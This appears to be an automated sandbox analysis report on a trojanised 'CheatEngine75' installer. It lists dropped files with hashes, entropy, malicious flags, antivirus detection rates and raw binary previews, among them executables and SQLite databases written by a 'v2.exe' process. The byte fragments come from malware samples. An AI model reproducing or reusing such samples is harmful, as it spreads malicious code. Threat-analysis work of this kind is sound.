                                                                                                                                                                                                                                    Preview:PK........v..U......_..._.....WZSetup.exe.}xT.7..+...{..F.....R4`.Ct..!X.&.....Bp.#......l6c9.zlk-.=.-..Z.....IP..Q.Bk.T.8Q..a.....g..y.{......?Np.^..Z.^..Zko=...Y8..".:...?7...u!................77......uk7m....-l.6.n.TX..Wx_....99YE)..z...q..p.].G.,^yt!K_}.#<..x...../?..t. .O..+p.".....%k.y..o.6ep..$...$.[...!L5.F.(.P.=._..%&....a.........@....pU....|..\.....9.i..]<C..*...Z......$..B.[3.a.Z...>.3...z=7..aT......R..O..glJU.......S...u.3..7\%.-_...?#......F..W.M.^,.o.*.I9rU.S.68.S..^]r.C..z...n.>..q>.:{&..s./+Z.".v.S.GT.3..6....:aM.m....r)......FS...h..c......z....(.F..........S_G.Z,..;.P...-8-...{.........'.q..Y..*B....C.....t)O?&....I.w....r].....U..m.....2.:.>'..)hv<..E..oY......:;.H@?aL8X.z..,....v..@9..x2P...w..i....'..*.....#..G.......l.:`..D.c*.]....q....CT..0.U.P.,Z.$&...(..%.Cba.9.sJ..;%....J.Q.*m.....]..<`..Vk.X./7.Q.:..Pr.r&.x..B....Y...8...yJ....Q...........gRy.GV.T...II.4m(..-.0<.3.6<.H$]6..v7.R...:`..aN<#7%91C^lw'>V
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):6227973
                                                                                                                                                                                                                                    Entropy (8bit):7.999704627939555
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:98304:ppxj2IwVGwxnd+P0fY8eHeM1euEuR+HW84l7mKN2Yjwov3I7qs4zLGGlFtSNNkoo:ppxZ7k00fxeHejFHW3l113I7d4zLGGTL
                                                                                                                                                                                                                                    MD5:7CC0288A2A8BBE014F9E344F3068C8F1
                                                                                                                                                                                                                                    SHA1:EB47D401AE30A308DD66BDCAFDE06CDD35E25C94
                                                                                                                                                                                                                                    SHA-256:200E9BC4FCF2C6682DDC8C7F172A0D02BEFECD25CA882F66C6ABC868A54B8975
                                                                                                                                                                                                                                    SHA-512:869F0A01EF0BCBBFC501C1786E14BFFEAA2DAAA00210C312874FC67A724C77EF61394BB5854B9A02AF654CD045C4D39AE30D73F1B4EC8AA9E531DFEEA1714476
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:PK........v..U......_..._.....WZSetup.exe.}xT.7..+...{..F.....R4`.Ct..!X.&.....Bp.#......l6c9.zlk-.=.-..Z.....IP..Q.Bk.T.8Q..a.....g..y.{......?Np.^..Z.^..Zko=...Y8..".:...?7...u!................77......uk7m....-l.6.n.TX..Wx_....99YE)..z...q..p.].G.,^yt!K_}.#<..x...../?..t. .O..+p.".....%k.y..o.6ep..$...$.[...!L5.F.(.P.=._..%&....a.........@....pU....|..\.....9.i..]<C..*...Z......$..B.[3.a.Z...>.3...z=7..aT......R..O..glJU.......S...u.3..7\%.-_...?#......F..W.M.^,.o.*.I9rU.S.68.S..^]r.C..z...n.>..q>.:{&..s./+Z.".v.S.GT.3..6....:aM.m....r)......FS...h..c......z....(.F..........S_G.Z,..;.P...-8-...{.........'.q..Y..*B....C.....t)O?&....I.w....r].....U..m.....2.:.>'..)hv<..E..oY......:;.H@?aL8X.z..,....v..@9..x2P...w..i....'..*.....#..G.......l.:`..D.c*.]....q....CT..0.U.P.,Z.$&...(..%.Cba.9.sJ..;%....J.Q.*m.....]..<`..Vk.X./7.Q.:..Pr.r&.x..B....Y...8...yJ....Q...........gRy.GV.T...II.4m(..-.0<.3.6<.H$]6..v7.R...:`..aN<#7%91C^lw'>V
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):6261520
                                                                                                                                                                                                                                    Entropy (8bit):7.998950113701314
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:98304:O/KXgWUBu+NlRk9OfK2GTyYX+eyaB135PSuXTm0LuM74eL3o1+ykb5io5dtWx9eJ:O/KXNs6OfxGTyHwnXZB3o1jkb5ioPtE2
                                                                                                                                                                                                                                    MD5:3C17F28CC001F6652377D3B5DEEC10F0
                                                                                                                                                                                                                                    SHA1:EEB13CF47836FF0A0D5CC380618F33E7818F9D75
                                                                                                                                                                                                                                    SHA-256:FA352552306B80F3F897F8F21D8579AE642C97D12298E113AE1ADC03902C69B8
                                                                                                                                                                                                                                    SHA-512:240B31F29D439C09A56D3BF8D4A3EA14F75C2286E209E7DF3F4FF301BFA3AD8228D7BEBE01ACEA6F2F702A0BA7ECDB5583B97372725C77EF497E749740F644B3
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L...<.Oa.................f...|.......3............@.......................... ........`...@.................................D...........HD...........2_..Y...........................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...8U...........~..............@....ndata...................................rsrc...HD.......F..................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):33432
                                                                                                                                                                                                                                    Entropy (8bit):5.359517379714029
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:Wj1b3suKzD3S8AktYcFA/Vc6KB5YiR2yAMxkE4gu5P:FzDC8AY8Vclv7jxfu5P
                                                                                                                                                                                                                                    MD5:F39C2690BCCC422B84D70E55F76640E5
                                                                                                                                                                                                                                    SHA1:D8D4D4391BCCB01003065593B719E65767AECF03
                                                                                                                                                                                                                                    SHA-256:3D57182EAC0111FD2827478722394134A39D18B9E61CEC5A053C5550411E3F3A
                                                                                                                                                                                                                                    SHA-512:5D52F1323B1E31A0ECD5403A840D6484053A8808ACC6979F61D1EF0C25708B6B93D98C8D832255F73382472B1207433051904B0E956DCCF469918DFDB6329A45
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.............N1... ...@....@.. ...............................O....`..................................0..O....@...............*...X...`......P0..8............................................ ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......(..............@..B................01......H........#...............................................................0..N........r...p~....o.......o....,,.o....o.....1...o.....o....r...p.(....o....*..o....*...0..3........o....(.......o....,...o....*...o......o....o.....*..0..........r...prO..p(....s.....(....(....r...p(....(..............-...........8...............%..:..o..........o.........i.0.~....+.........r...p(....-H..r...p(....-:..r...p(....-,..r...p(....-{..r...p(....-q..r...p(....-g+h..( ...-_..(........o!...
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):33432
                                                                                                                                                                                                                                    Entropy (8bit):5.359517379714029
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:Wj1b3suKzD3S8AktYcFA/Vc6KB5YiR2yAMxkE4gu5P:FzDC8AY8Vclv7jxfu5P
                                                                                                                                                                                                                                    MD5:F39C2690BCCC422B84D70E55F76640E5
                                                                                                                                                                                                                                    SHA1:D8D4D4391BCCB01003065593B719E65767AECF03
                                                                                                                                                                                                                                    SHA-256:3D57182EAC0111FD2827478722394134A39D18B9E61CEC5A053C5550411E3F3A
                                                                                                                                                                                                                                    SHA-512:5D52F1323B1E31A0ECD5403A840D6484053A8808ACC6979F61D1EF0C25708B6B93D98C8D832255F73382472B1207433051904B0E956DCCF469918DFDB6329A45
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.............N1... ...@....@.. ...............................O....`..................................0..O....@...............*...X...`......P0..8............................................ ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......(..............@..B................01......H........#...............................................................0..N........r...p~....o.......o....,,.o....o.....1...o.....o....r...p.(....o....*..o....*...0..3........o....(.......o....,...o....*...o......o....o.....*..0..........r...prO..p(....s.....(....(....r...p(....(..............-...........8...............%..:..o..........o.........i.0.~....+.........r...p(....-H..r...p(....-:..r...p(....-,..r...p(....-{..r...p(....-q..r...p(....-g+h..( ...-_..(........o!...
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2060288
                                                                                                                                                                                                                                    Entropy (8bit):6.611521905910169
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:a4yxp/wFOn9xRo3HVCEi2ynjsPAXkp4K0x8BFuchaFotKLIk:aJTwo93o3UEi2ynjs4Up4KI8BFucME
                                                                                                                                                                                                                                    MD5:3037E3D5409FB6A697F12ADDB01BA99B
                                                                                                                                                                                                                                    SHA1:5D80D1C9811BDF8A6CE8751061E21F4AF532F036
                                                                                                                                                                                                                                    SHA-256:A860BD74595430802F4E2E7AD8FD1D31D3DA3B0C9FAF17AD4641035181A5CE9E
                                                                                                                                                                                                                                    SHA-512:80A78A5D18AFC83BA96264638820D9EED3DAE9C7FC596312AC56F7E0BA97976647F27BD86EA586524B16176280BD26DAED64A3D126C3454A191B0ADC2BC4E35D
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......c./}'.A.'.A.'.A.l.B/:.A.l.F/&.A.l.E/..A.l.D/..A.l.G/&.A.l.@/..A.'.@.-.A.u.E/5.A.u.B/?.A.u.D/Y.A..H/$.A..A/&.A...&.A.'...&.A..C/&.A.Rich'.A.........................PE..L...i..f...........!.....f...N............................................................@.........................0...........T........A..............................p...............................@............................................text....e.......f.................. ..`.rdata..>L.......N...j..............@..@.data............Z..................@....rsrc....A.......B..................@..@.reloc...............T..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\CheatEngine75.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):3210656
                                                                                                                                                                                                                                    Entropy (8bit):6.333393446294699
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:2WGtLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbQ333TY:6tLutqgwh4NYxtJpkxhGj333T
                                                                                                                                                                                                                                    MD5:E652D75D1D0D3F03B6B730E064E9194C
                                                                                                                                                                                                                                    SHA1:C4220D57971C63A3F0B9F5B68560AEDFDEC18E64
                                                                                                                                                                                                                                    SHA-256:8958B8D498068BD0657587A04AAF011E7EABEB215276694366A154DA8B55BDB9
                                                                                                                                                                                                                                    SHA-512:E5E5807224F0858D472584D06975DBE75677AD0A00727B63D1F8E2108DAE179CB469EBAE127BE6C8D5B9DE192BC741637FE1C8A9A4EF3AE46A3BDE76B534A766
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                    Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................L,.........hf,......p,...@...........................1.....YA1...@......@....................-.......-..9....................0..+...........................................................-.......-......................text.... ,......",................. ..`.itext...(...@,..*...&,............. ..`.data...X....p,......P,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-......*-.............@..@.tls....L.....-..........................rdata..]............,-.............@..@.rsrc.................-.............@..@..............1.......0.............@..@........................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):106496
                                                                                                                                                                                                                                    Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):5242880
                                                                                                                                                                                                                                    Entropy (8bit):0.03859996294213402
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                                                                                                                                                    MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                                                                                                                                                    SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                                                                                                                                                    SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                                                                                                                                                    SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):159744
                                                                                                                                                                                                                                    Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                    MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                    SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                    SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                    SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):159744
                                                                                                                                                                                                                                    Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                    MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                    SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                    SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                    SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):106496
                                                                                                                                                                                                                                    Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):98304
                                                                                                                                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):196608
                                                                                                                                                                                                                                    Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):5242880
                                                                                                                                                                                                                                    Entropy (8bit):0.03859996294213402
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                                                                                                                                                    MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                                                                                                                                                    SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                                                                                                                                                    SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                                                                                                                                                    SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):196608
                                                                                                                                                                                                                                    Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):51200
                                                                                                                                                                                                                                    Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):155648
                                                                                                                                                                                                                                    Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                    MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                    SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                    SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
